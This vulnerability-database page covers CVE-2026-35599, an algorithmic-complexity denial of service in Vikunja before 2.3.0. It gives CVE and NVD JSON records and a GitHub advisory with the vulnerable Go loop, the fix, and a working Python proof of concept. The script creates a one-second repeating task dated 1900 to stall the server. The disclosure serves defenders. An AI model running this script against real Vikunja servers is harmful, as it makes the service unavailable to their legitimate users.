Vulnerability-Lookup

CVE-2026-35599 (GCVE-0-2026-35599)

Vulnerability from cvelistv5 – Published: 2026-04-10 16:05 – Updated: 2026-04-10 18:28

Title

Vikunja has an Algorithmic Complexity DoS in Repeating Task Handler

Summary

Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the addRepeatIntervalToTime function uses an O(n) loop that advances a date by the task's RepeatAfter duration until it exceeds the current time. By creating a repeating task with a 1-second interval and a due date far in the past, an attacker triggers billions of loop iterations, consuming CPU and holding a database connection for minutes per request. This vulnerability is fixed in 2.3.0.

Severity ?

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-407 - Inefficient Algorithmic Complexity

Assigner

GitHub_M

References

URL

Tags

	https://github.com/go-vikunja/vikunja/security/ad…	x_refsource_CONFIRM
	https://github.com/go-vikunja/vikunja/pull/2577	x_refsource_MISC
	https://github.com/go-vikunja/vikunja/commit/6df0…	x_refsource_MISC
	https://github.com/go-vikunja/vikunja/releases/ta…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	go-vikunja	vikunja	Affected: < 2.3.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-35599",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-10T18:27:47.907031Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-10T18:28:29.310Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "vikunja",
          "vendor": "go-vikunja",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.3.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the addRepeatIntervalToTime function uses an O(n) loop that advances a date by the task\u0027s RepeatAfter duration until it exceeds the current time. By creating a repeating task with a 1-second interval and a due date far in the past, an attacker triggers billions of loop iterations, consuming CPU and holding a database connection for minutes per request. This vulnerability is fixed in 2.3.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-407",
              "description": "CWE-407: Inefficient Algorithmic Complexity",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-10T16:05:57.581Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-r4fg-73rc-hhh7",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-r4fg-73rc-hhh7"
        },
        {
          "name": "https://github.com/go-vikunja/vikunja/pull/2577",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/go-vikunja/vikunja/pull/2577"
        },
        {
          "name": "https://github.com/go-vikunja/vikunja/commit/6df0d6c8f54b01db6464c42810e40e55f12b481b",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/go-vikunja/vikunja/commit/6df0d6c8f54b01db6464c42810e40e55f12b481b"
        },
        {
          "name": "https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0"
        }
      ],
      "source": {
        "advisory": "GHSA-r4fg-73rc-hhh7",
        "discovery": "UNKNOWN"
      },
      "title": "Vikunja has an Algorithmic Complexity DoS in Repeating Task Handler"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-35599",
    "datePublished": "2026-04-10T16:05:57.581Z",
    "dateReserved": "2026-04-03T21:25:12.162Z",
    "dateUpdated": "2026-04-10T18:28:29.310Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-35599\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-10T17:17:03.520\",\"lastModified\":\"2026-04-10T17:17:03.520\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the addRepeatIntervalToTime function uses an O(n) loop that advances a date by the task\u0027s RepeatAfter duration until it exceeds the current time. By creating a repeating task with a 1-second interval and a due date far in the past, an attacker triggers billions of loop iterations, consuming CPU and holding a database connection for minutes per request. This vulnerability is fixed in 2.3.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-407\"}]}],\"references\":[{\"url\":\"https://github.com/go-vikunja/vikunja/commit/6df0d6c8f54b01db6464c42810e40e55f12b481b\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/go-vikunja/vikunja/pull/2577\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/go-vikunja/vikunja/security/advisories/GHSA-r4fg-73rc-hhh7\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-35599\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-10T18:27:47.907031Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-10T18:28:17.872Z\"}}], \"cna\": {\"title\": \"Vikunja has an Algorithmic Complexity DoS in Repeating Task Handler\", \"source\": {\"advisory\": \"GHSA-r4fg-73rc-hhh7\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"go-vikunja\", \"product\": \"vikunja\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.3.0\"}]}], \"references\": [{\"url\": \"https://github.com/go-vikunja/vikunja/security/advisories/GHSA-r4fg-73rc-hhh7\", \"name\": \"https://github.com/go-vikunja/vikunja/security/advisories/GHSA-r4fg-73rc-hhh7\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/go-vikunja/vikunja/pull/2577\", \"name\": \"https://github.com/go-vikunja/vikunja/pull/2577\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/go-vikunja/vikunja/commit/6df0d6c8f54b01db6464c42810e40e55f12b481b\", \"name\": \"https://github.com/go-vikunja/vikunja/commit/6df0d6c8f54b01db6464c42810e40e55f12b481b\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0\", \"name\": \"https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the addRepeatIntervalToTime function uses an O(n) loop that advances a date by the task\u0027s RepeatAfter duration until it exceeds the current time. By creating a repeating task with a 1-second interval and a due date far in the past, an attacker triggers billions of loop iterations, consuming CPU and holding a database connection for minutes per request. This vulnerability is fixed in 2.3.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-407\", \"description\": \"CWE-407: Inefficient Algorithmic Complexity\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-10T16:05:57.581Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-35599\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-10T18:28:29.310Z\", \"dateReserved\": \"2026-04-03T21:25:12.162Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-10T16:05:57.581Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-R4FG-73RC-HHH7

Vulnerability from github – Published: 2026-04-10 15:34 – Updated: 2026-04-10 19:36

Summary

Vikunja has Algorithmic Complexity DoS in Repeating Task Handler

Details

Summary

The addRepeatIntervalToTime function uses an O(n) loop that advances a date by the task's RepeatAfter duration until it exceeds the current time. By creating a repeating task with a 1-second interval and a due date far in the past, an attacker triggers billions of loop iterations, consuming CPU and holding a database connection for minutes per request.

Details

The vulnerable function at pkg/models/tasks.go:1456-1464:

func addRepeatIntervalToTime(now, t time.Time, duration time.Duration) time.Time {
    for {
        t = t.Add(duration)
        if t.After(now) {
            break
        }
    }
    return t
}

The RepeatAfter field accepts any positive integer (validated as range(0|9223372036854775807)), and DueDate accepts any valid timestamp including dates far in the past. When a task with repeat_after=1 and due_date=1900-01-01 is marked as done, the loop runs approximately 4 billion iterations (~60+ seconds of CPU time).

Each request holds a goroutine and a database connection for the duration. With the default connection pool size of 100, approximately 100 concurrent requests exhaust all available connections.

Proof of Concept

Tested on Vikunja v2.2.2.

import requests, time

TARGET = "http://localhost:3456"
API = f"{TARGET}/api/v1"

token = requests.post(f"{API}/login",
    json={"username": "user1", "password": "User1pass!"}).json()["token"]
h = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}

proj = requests.put(f"{API}/projects", headers=h, json={"title": "DoS Test"}).json()

# create task with repeat_after=1 second and a date far in the past
task = requests.put(f"{API}/projects/{proj['id']}/tasks", headers=h,
    json={"title": "DoS", "repeat_after": 1,
          "due_date": "1900-01-01T00:00:00Z"}).json()

# mark done - triggers the vulnerable loop
start = time.time()
try:
    r = requests.post(f"{API}/tasks/{task['id']}", headers=h,
        json={"title": "DoS", "done": True}, timeout=120)
    print(f"Response: {r.status_code} in {time.time()-start:.1f}s")
except requests.exceptions.Timeout:
    print(f"TIMEOUT after {time.time()-start:.1f}s")

Output:

TIMEOUT after 60.0s

The request hangs for 60+ seconds (the loop runs ~4 billion iterations). For comparison, due_date=2020-01-01 completes in ~4.8 seconds, confirming the linear relationship. Each request holds a goroutine and a database connection for the duration.

Impact

Any authenticated user can render the Vikunja instance unresponsive by creating repeating tasks with small intervals and dates far in the past, then marking them as done. With the default database connection pool of 100, approximately 100 concurrent requests would exhaust all connections, preventing all users from accessing the application.

Recommended Fix

Replace the O(n) loop with O(1) arithmetic:

func addRepeatIntervalToTime(now, t time.Time, duration time.Duration) time.Time {
    if duration <= 0 {
        return t
    }
    diff := now.Sub(t)
    if diff <= 0 {
        return t.Add(duration)
    }
    intervals := int64(diff/duration) + 1
    return t.Add(time.Duration(intervals) * duration)
}

Found and reported by aisafe.io

Severity ?

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.2.2"
      },
      "package": {
        "ecosystem": "Go",
        "name": "code.vikunja.io/api"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-35599"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-407"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-10T15:34:41Z",
    "nvd_published_at": "2026-04-10T17:17:03Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe `addRepeatIntervalToTime` function uses an O(n) loop that advances a date by the task\u0027s `RepeatAfter` duration until it exceeds the current time. By creating a repeating task with a 1-second interval and a due date far in the past, an attacker triggers billions of loop iterations, consuming CPU and holding a database connection for minutes per request.\n\n## Details\n\nThe vulnerable function at `pkg/models/tasks.go:1456-1464`:\n\n```go\nfunc addRepeatIntervalToTime(now, t time.Time, duration time.Duration) time.Time {\n    for {\n        t = t.Add(duration)\n        if t.After(now) {\n            break\n        }\n    }\n    return t\n}\n```\n\nThe `RepeatAfter` field accepts any positive integer (validated as `range(0|9223372036854775807)`), and `DueDate` accepts any valid timestamp including dates far in the past. When a task with `repeat_after=1` and `due_date=1900-01-01` is marked as done, the loop runs approximately 4 billion iterations (~60+ seconds of CPU time).\n\nEach request holds a goroutine and a database connection for the duration. With the default connection pool size of 100, approximately 100 concurrent requests exhaust all available connections.\n\n## Proof of Concept\n\nTested on Vikunja v2.2.2.\n\n```python\nimport requests, time\n\nTARGET = \"http://localhost:3456\"\nAPI = f\"{TARGET}/api/v1\"\n\ntoken = requests.post(f\"{API}/login\",\n    json={\"username\": \"user1\", \"password\": \"User1pass!\"}).json()[\"token\"]\nh = {\"Authorization\": f\"Bearer {token}\", \"Content-Type\": \"application/json\"}\n\nproj = requests.put(f\"{API}/projects\", headers=h, json={\"title\": \"DoS Test\"}).json()\n\n# create task with repeat_after=1 second and a date far in the past\ntask = requests.put(f\"{API}/projects/{proj[\u0027id\u0027]}/tasks\", headers=h,\n    json={\"title\": \"DoS\", \"repeat_after\": 1,\n          \"due_date\": \"1900-01-01T00:00:00Z\"}).json()\n\n# mark done - triggers the vulnerable loop\nstart = time.time()\ntry:\n    r = requests.post(f\"{API}/tasks/{task[\u0027id\u0027]}\", headers=h,\n        json={\"title\": \"DoS\", \"done\": True}, timeout=120)\n    print(f\"Response: {r.status_code} in {time.time()-start:.1f}s\")\nexcept requests.exceptions.Timeout:\n    print(f\"TIMEOUT after {time.time()-start:.1f}s\")\n```\n\nOutput:\n```\nTIMEOUT after 60.0s\n```\n\nThe request hangs for 60+ seconds (the loop runs ~4 billion iterations). For comparison, `due_date=2020-01-01` completes in ~4.8 seconds, confirming the linear relationship. Each request holds a goroutine and a database connection for the duration.\n\n## Impact\n\nAny authenticated user can render the Vikunja instance unresponsive by creating repeating tasks with small intervals and dates far in the past, then marking them as done. With the default database connection pool of 100, approximately 100 concurrent requests would exhaust all connections, preventing all users from accessing the application.\n\n## Recommended Fix\n\nReplace the O(n) loop with O(1) arithmetic:\n\n```go\nfunc addRepeatIntervalToTime(now, t time.Time, duration time.Duration) time.Time {\n    if duration \u003c= 0 {\n        return t\n    }\n    diff := now.Sub(t)\n    if diff \u003c= 0 {\n        return t.Add(duration)\n    }\n    intervals := int64(diff/duration) + 1\n    return t.Add(time.Duration(intervals) * duration)\n}\n```\n\n---\n*Found and reported by [aisafe.io](https://aisafe.io)*",
  "id": "GHSA-r4fg-73rc-hhh7",
  "modified": "2026-04-10T19:36:35Z",
  "published": "2026-04-10T15:34:41Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-r4fg-73rc-hhh7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35599"
    },
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/pull/2577"
    },
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/commit/6df0d6c8f54b01db6464c42810e40e55f12b481b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/go-vikunja/vikunja"
    },
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Vikunja has Algorithmic Complexity DoS in Repeating Task Handler"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-35599 (GCVE-0-2026-35599)

GHSA-R4FG-73RC-HHH7

Summary

Details

Proof of Concept

Impact

Recommended Fix

Tags

Sightings

Nomenclature